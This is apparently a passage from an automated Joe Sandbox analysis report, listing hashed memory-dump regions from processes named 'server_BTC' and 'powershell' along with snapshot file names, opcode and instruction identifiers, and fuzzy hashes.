                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52cf91ac0e82fa41031fdc73e4a84da0acdc4c2bb1f1631b842773f5980bbbd4
                                                                                                              • Instruction ID: a188c8661ca3997e0ec6733285fa816262205eb944a0b9f48c2a92e7542230e6
                                                                                                              • Opcode Fuzzy Hash: 52cf91ac0e82fa41031fdc73e4a84da0acdc4c2bb1f1631b842773f5980bbbd4
                                                                                                              • Instruction Fuzzy Hash: 58210071D082589FDB11EFE9D884BEEFBB5AF58300F248059E415AB3A1CB759842CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 62de7218c2a93ffcd161afa2b968725ef98e6d34afce4e7691ec5f1e8746eaf2
                                                                                                              • Instruction ID: 7dadc9222b6811f387a581df2b92ea84d392345983b9c4d558db8304bf006799
                                                                                                              • Opcode Fuzzy Hash: 62de7218c2a93ffcd161afa2b968725ef98e6d34afce4e7691ec5f1e8746eaf2
                                                                                                              • Instruction Fuzzy Hash: 9411AD753443005FD702ABB8E965A5A3FAAEB8B310B4084B5E146CB37ADE24DC158B92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f03090433da11faf4f09b1c18cd851198cafb10cfa8eb3dfd4de235586e412fa
                                                                                                              • Instruction ID: bd76d12d140bb7e1534b326f14c1d87aa9881c81278e17844e8324a44a0a7344
                                                                                                              • Opcode Fuzzy Hash: f03090433da11faf4f09b1c18cd851198cafb10cfa8eb3dfd4de235586e412fa
                                                                                                              • Instruction Fuzzy Hash: 1421CDB4C093459FDB01EFB4D8583AEBFB0FF46305F0548AAC450A7292DB780A85CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6d87f6d84b64e87796536b73f8014713114f086088c6fbf64b7f1dcbb41ea709
                                                                                                              • Instruction ID: 13abe847e51ab1af6413f1140a697cfabc4147cba8809767fa5f942a9ec01b30
                                                                                                              • Opcode Fuzzy Hash: 6d87f6d84b64e87796536b73f8014713114f086088c6fbf64b7f1dcbb41ea709
                                                                                                              • Instruction Fuzzy Hash: E7015670C04209DFDB04EFB4C55C7AEBBF0FB45301F1098AA8421A3290DB781A88DF91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 66527606c7978be435e6702ac9de8826aca4d089fbd282eded451e2476affe55
                                                                                                              • Instruction ID: 958cf4efa25afe86ffb577ae1bf3a51a0e2b988a88bdd5cab642d27ed1758f2f
                                                                                                              • Opcode Fuzzy Hash: 66527606c7978be435e6702ac9de8826aca4d089fbd282eded451e2476affe55
                                                                                                              • Instruction Fuzzy Hash: E101C874A41319DFCB68DB31D8517AA7332AF86314F5094E9C04967254CE369E89CF06
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65c83ee24926bbcb92a5bf34a9ba28d25df6ab018f0731c9198a6bb5f94d87f4
                                                                                                              • Instruction ID: 217b69cb6da5a7c7b9253d179d903fa9154f4525e37bdf5ea9e7ec91f048d74c
                                                                                                              • Opcode Fuzzy Hash: 65c83ee24926bbcb92a5bf34a9ba28d25df6ab018f0731c9198a6bb5f94d87f4
                                                                                                              • Instruction Fuzzy Hash: 50F08C74904115CFCB24EFB4D4586BCBBB0EF0B312F0064A6D18AA7220CB30AD85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 54817ce1c18c8932492df69f6cd405ebfc4940e4c95fa0d2cc69a77686128e44
                                                                                                              • Instruction ID: b5fd2a50a4d5795352a3cbd729c1bf58a1300e63a0cdf355ac1e8861f71d293c
                                                                                                              • Opcode Fuzzy Hash: 54817ce1c18c8932492df69f6cd405ebfc4940e4c95fa0d2cc69a77686128e44
                                                                                                              • Instruction Fuzzy Hash: B5F039B8914144DFD744FFB4EA98A19BFB4FB88311F1081A9DA09A73B0EB309D45CB80
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2fc24489dcea5841849cc3ee382644510c48d506519ce2238cd5b1cafe896f08
                                                                                                              • Instruction ID: 8e75bbcd220c663cc5e0180056bf5791aad1ff27beba203ba7262a4e350cccac
                                                                                                              • Opcode Fuzzy Hash: 2fc24489dcea5841849cc3ee382644510c48d506519ce2238cd5b1cafe896f08
                                                                                                              • Instruction Fuzzy Hash: DAE022B0A04288DFDB00EFB0EA1429D7BB4DB86300F0084BAC44AA7251DA342F10DBD2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cccb288068bb7068b5001393bd35c15ac0e44a6a14d89b3b45605ee13db25915
                                                                                                              • Instruction ID: 36f7e43b63c019d8664e230bcb592c0c35d5e92a1236c58e0c1084aca2243604
                                                                                                              • Opcode Fuzzy Hash: cccb288068bb7068b5001393bd35c15ac0e44a6a14d89b3b45605ee13db25915
                                                                                                              • Instruction Fuzzy Hash: 4AE01AB8914218DFC744EFB8E998A59BBB8FB49311F1041A9D90993370E730AD45CB81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6764be22da2d2bb78848891af9917657c463f08b17ee348550e405906633e234
                                                                                                              • Instruction ID: 2df2faa46a60975e321a2e23b3e02c18c1b8cac910b82a8652d1545c0d513abc
                                                                                                              • Opcode Fuzzy Hash: 6764be22da2d2bb78848891af9917657c463f08b17ee348550e405906633e234
                                                                                                              • Instruction Fuzzy Hash: E3E08C70900208EFDB40EFB4EA05B9DB7F9EB45304F0085B9D40AA3250DB752E00DBD2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6ed17f0ecb0e4400882dce5a8b47548711a4879be14c4561b47ac0103afe5f8f
                                                                                                              • Instruction ID: 2ff32584dec73f9779587bbb154e15f2eb7dca3918436be383f1c67680b82898
                                                                                                              • Opcode Fuzzy Hash: 6ed17f0ecb0e4400882dce5a8b47548711a4879be14c4561b47ac0103afe5f8f
                                                                                                              • Instruction Fuzzy Hash: 47D0A732804382C7E674AF64AE8CB55F734D741315F0006D6E534151E89B641441CB96
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 194ce8bd2af05b85f9d26b9eed2d86d16adaed1682d0b060c7a9ecde50899df2
                                                                                                              • Instruction ID: ba2f1b2081dc2186e9e7d986a0c8a9537f23dddf9f1873323cb5fa2e7e087e6c
                                                                                                              • Opcode Fuzzy Hash: 194ce8bd2af05b85f9d26b9eed2d86d16adaed1682d0b060c7a9ecde50899df2
                                                                                                              • Instruction Fuzzy Hash: 60C08070808308DBD340EFF4B805B15BB7CD746315F400169D41853300D7755840DBD6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7aa379266b0196a69f7b778675712c5d01fb545f96bc7d80230d3b631f49e6ae
                                                                                                              • Instruction ID: 0334af4622d419afe4e3c84a845431061663b7b1dc9ae2507d3e8a27fd3b45ab
                                                                                                              • Opcode Fuzzy Hash: 7aa379266b0196a69f7b778675712c5d01fb545f96bc7d80230d3b631f49e6ae
                                                                                                              • Instruction Fuzzy Hash: CAC08071804348DBC354DF94B904B15BB7CD742301F000179D91853240D7755C40D7E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 74cdddba8b0f4314b847d4008296ce83083d2dfe3f4545f220109bde74be14b2
                                                                                                              • Instruction ID: 368a8f67343de9a9242c8d51c56f673e42d3881ef64a54f5d4e4f515b80a1e22
                                                                                                              • Opcode Fuzzy Hash: 74cdddba8b0f4314b847d4008296ce83083d2dfe3f4545f220109bde74be14b2
                                                                                                              • Instruction Fuzzy Hash: 81918F71E007145BEF15DFB888106AE7BF2EFC4B01B018969D106AB344DF76AE068BD5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f48386a5a7ce0fece7820b7a7061da5ce1b8020230a67834d17a5cc037d33d14
                                                                                                              • Instruction ID: 36d23b889471883e584128b86e2fee75dc7972c87b3bc7056eb77b95628c53f6
                                                                                                              • Opcode Fuzzy Hash: f48386a5a7ce0fece7820b7a7061da5ce1b8020230a67834d17a5cc037d33d14
                                                                                                              • Instruction Fuzzy Hash: B1916071E007145BEF15DFB888106AE7BE3EFC4B01B118929D116AB344DF76AE068BD5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$pij$|,j$J&l$J&l$J&l$r%l$r%l
                                                                                                              • API String ID: 0-4269462225
                                                                                                              • Opcode ID: 1542faf11c1fc5c0d5518898f3f81373c49d09f6fa168663049a0322126e9feb
                                                                                                              • Instruction ID: b02572cce2420343447c5996eb4cec4b2b98db332e500ebf7b76008cfb871cbb
                                                                                                              • Opcode Fuzzy Hash: 1542faf11c1fc5c0d5518898f3f81373c49d09f6fa168663049a0322126e9feb
                                                                                                              • Instruction Fuzzy Hash: F2F114B1B0020ADFDB249F6D88107AAB7E2BF96211F1480BAD945DB251DB75CD81C7E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$4'q$4'q
                                                                                                              • API String ID: 0-4210068417
                                                                                                              • Opcode ID: b23137a76267d775dd2506ca6b4769f82963f05c2fb35c79d66473f5d3aed87b
                                                                                                              • Instruction ID: 6ef6aa71b9bc44df3b94dabf0ca363e6b1803e8c63189695aa103d3ed70e1b56
                                                                                                              • Opcode Fuzzy Hash: b23137a76267d775dd2506ca6b4769f82963f05c2fb35c79d66473f5d3aed87b
                                                                                                              • Instruction Fuzzy Hash: 3C1276B1B0434A9FDB218F6C981077ABBA2AFE2215F1480BAD909CF641DB35CC51C7E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q
                                                                                                              • API String ID: 0-2414175341
                                                                                                              • Opcode ID: 4f37a7779699ffd6dc2232639fd803aba58f4f7c3b3f1eed86050c6b0db52f81
                                                                                                              • Instruction ID: a6005d293977e8249a3fc739f21d0796c38d13ccd990396ec41f7b43039017cf
                                                                                                              • Opcode Fuzzy Hash: 4f37a7779699ffd6dc2232639fd803aba58f4f7c3b3f1eed86050c6b0db52f81
                                                                                                              • Instruction Fuzzy Hash: C4413834B14204DFDB14DFA8C468AAEBBF6AF8D711F1544A8E402AB391DE31AC01CB61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (&q
                                                                                                              • API String ID: 0-583763264
                                                                                                              • Opcode ID: f49fc7999434cb9cb9dd5f9d20f7e19752d686538f1c68a345e94f4c7f8dacd2
                                                                                                              • Instruction ID: 9bbb65aca320da4b4695718a3b2caf75f48ef66a35c27cf7d98e9f62af377412
                                                                                                              • Opcode Fuzzy Hash: f49fc7999434cb9cb9dd5f9d20f7e19752d686538f1c68a345e94f4c7f8dacd2
                                                                                                              • Instruction Fuzzy Hash: F821E071A043488FDB24DFAED404BAEBBF5EF88320F14806ED418E7340CB75A8458BA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 96d3f954bb38681cf4abda6f7e8b1a9b5e81d2b50a90138ce086b267cbd0f85f
                                                                                                              • Instruction ID: bd244b0e45665ba1e7cf7292ffac8757cabc732bcfc252b1d96e721f59e83b99
                                                                                                              • Opcode Fuzzy Hash: 96d3f954bb38681cf4abda6f7e8b1a9b5e81d2b50a90138ce086b267cbd0f85f
                                                                                                              • Instruction Fuzzy Hash: 05917E74A006099FCB15CF58C494AAAFBF1FF48310B2489A9D915EB3A5C735FC91CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb60a4247b904d4cbfdf1e4cfb5eebfe2dc9b7fd0d7cd77872ee3d0409b80843
                                                                                                              • Instruction ID: 08da70bde816f69adf39746ea526e7fd6ed3d9d0ffde84fedde0952535a77399
                                                                                                              • Opcode Fuzzy Hash: fb60a4247b904d4cbfdf1e4cfb5eebfe2dc9b7fd0d7cd77872ee3d0409b80843
                                                                                                              • Instruction Fuzzy Hash: D1614774E012489FDB14CFA9D484B9DBBF2FF89310F15806AE819AB351EB74AC45CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8532166644c0cde636793bc806afc7953ea75962d00769ee40328b5379fbd55b
                                                                                                              • Instruction ID: e106e1104167fdd0ef8eb079ca73e30a8050f061768b48d28a373251eba2a5eb
                                                                                                              • Opcode Fuzzy Hash: 8532166644c0cde636793bc806afc7953ea75962d00769ee40328b5379fbd55b
                                                                                                              • Instruction Fuzzy Hash: 5651A131714205DFDB049BAAD884A2A77EAEFC9654B1588B9D505CB351EF35EC01CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3379ef993134b9c86420a6503e5cd24d9b38612ecf8fb67f4dd8579e21e7aebd
                                                                                                              • Instruction ID: 95532ba1b1773a9753ef6882ebda4c14325c6b4d2fecf0ca48124ad82cd19d28
                                                                                                              • Opcode Fuzzy Hash: 3379ef993134b9c86420a6503e5cd24d9b38612ecf8fb67f4dd8579e21e7aebd
                                                                                                              • Instruction Fuzzy Hash: 45612571E002489FDB14CFA9D584B9DFBF6FF89310F15816AE819AB250EB74AC41CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1659604667.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7830000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cf46418beed412dd33b4239adcd7961057ddc583e41ae0a2591d4e60b2487b89
                                                                                                              • Instruction ID: 422c2251721898336ff106bc357ad2414319252e0b7b73863a01fa9616ee6a6a
                                                                                                              • Opcode Fuzzy Hash: cf46418beed412dd33b4239adcd7961057ddc583e41ae0a2591d4e60b2487b89
                                                                                                              • Instruction Fuzzy Hash: 024137F1A14206EFCB208F6CC905A6BBBA29FA1245F0880A5D900DFE55C739DD45C7E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e1940669a22f72bfe884ff2f1bdd53ed710c3b1b991e6d9f1336ad07033ffb19
                                                                                                              • Instruction ID: 3ddf8bd8211bfa50739672f13cec645a369b748025085b35c402bd0ffea0a5aa
                                                                                                              • Opcode Fuzzy Hash: e1940669a22f72bfe884ff2f1bdd53ed710c3b1b991e6d9f1336ad07033ffb19
                                                                                                              • Instruction Fuzzy Hash: 5F411974A00609AFDB09CF58C498EAAF7F1FF48310B1585A9D915AB364D732FC91CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 74116fd41a474d90b15f44069ce249f02304ff41d688fa71a6bf5acbe4515755
                                                                                                              • Instruction ID: d5aaabe10aa83843d42d49c5dd668a4c91c5e441bdc685d77d0d9487c0a80b9e
                                                                                                              • Opcode Fuzzy Hash: 74116fd41a474d90b15f44069ce249f02304ff41d688fa71a6bf5acbe4515755
                                                                                                              • Instruction Fuzzy Hash: 5731C0353006049FE704EB78E844BAEB7A6EFC6655F008579D60ACB351DFB1AC46CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 91da9f8a133020c10d654cb0d5db382978e531c5e58a5f9aeb1e5b947d42930a
                                                                                                              • Instruction ID: 189f2031b38646f8a226db3479b9472d2512c7b513a588a0bbb99122f889bf5c
                                                                                                              • Opcode Fuzzy Hash: 91da9f8a133020c10d654cb0d5db382978e531c5e58a5f9aeb1e5b947d42930a
                                                                                                              • Instruction Fuzzy Hash: FF312A34A10245DFDB14CFA8C598AAEBBF6AF8D714F1854A8E402AB351DF71ED01CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3722b46352ae79b4be5eb111e00e19a6b247a34c3e0a5bbe2b67b51458632103
                                                                                                              • Instruction ID: 830c8d5a9f8f99e27cd18f70f53154a7f8f008d565e6a993ce9e36f04a3ca63c
                                                                                                              • Opcode Fuzzy Hash: 3722b46352ae79b4be5eb111e00e19a6b247a34c3e0a5bbe2b67b51458632103
                                                                                                              • Instruction Fuzzy Hash: 52316874A016499FDF04DFB9D494BAEBBF6EF88304F108069E405EB250EA749C418B61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7a566a82d60f81e56f59e663708168bf928b87a715eb0bcde95ccb47bb93c3cc
                                                                                                              • Instruction ID: 635db17dc1f1e3539e0909c966012d14cc12588bb5edba5b20792d2f883ad98a
                                                                                                              • Opcode Fuzzy Hash: 7a566a82d60f81e56f59e663708168bf928b87a715eb0bcde95ccb47bb93c3cc
                                                                                                              • Instruction Fuzzy Hash: 8231B0B4E002499FDB01DBA4D958BBEBBF3EF85700F1184A9D211AB395CA75AD018F60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d45c514b82eb684c1dc996106609b868433297b3143aa116031c771b63f4d45c
                                                                                                              • Instruction ID: 1b8425c341535624a43590f4fe03942ad1a0f241d8f7d4513f8930af49d35b11
                                                                                                              • Opcode Fuzzy Hash: d45c514b82eb684c1dc996106609b868433297b3143aa116031c771b63f4d45c
                                                                                                              • Instruction Fuzzy Hash: 26314874A016499FEF04DFADD4947AEBAF6EFC8300F109069E405EB350EB749C418BA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 44c296e7e9417e005ff8a0305eb066e1e79e49ae50598154c31f0b89d8442ee6
                                                                                                              • Instruction ID: 2807db92df49988dc921c8d57e44a4ac9c6e835f37525785f6e137224b21bb2f
                                                                                                              • Opcode Fuzzy Hash: 44c296e7e9417e005ff8a0305eb066e1e79e49ae50598154c31f0b89d8442ee6
                                                                                                              • Instruction Fuzzy Hash: 05219C747003449FDB01CB69D884A5EBBE6EF8A25874086A9D44ADF352CB74EC46CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1554281444.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_4990000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aba5e05098a00aff100d384f83562fc3a054b72b1ede96d7df2983995bbda424
                                                                                                              • Instruction ID: b864bc110a94b912f0fabebebbde8b8fe26e88a569ed0daf852abb2ae836eed0
                                                                                                              • Opcode Fuzzy Hash: aba5e05098a00aff100d384f83562fc3a054b72b1ede96d7df2983995bbda424
                                                                                                              • Instruction Fuzzy Hash: 353150B4E002099FDB04DFA4D959BBEB7F3EF85700F1084A8D611AB394DA75AD018F50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.1550960284.0000000002F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F6D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_2f6d000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a0870ae089c17d7df80a82de4631e5797abb602e0998c7c6b864d35e842a906c
                                                                                                              • Instruction ID: 7ef2679b100c2acf4c94ce97b778593cc484d0385d698dc184878b160b059bff
                                                                                                              • Opcode Fuzzy Hash: a0870ae089c17d7df80a82de4631e5797abb602e0998c7c6b864d35e842a906c
                                                                                                              • Instruction Fuzzy Hash: DA21F776604300DFDB05DF10EAC4B26BB65FB88314F24C6ADEA0A4BE56C336D456CBA1
                                                                                                              Memory Dump Source
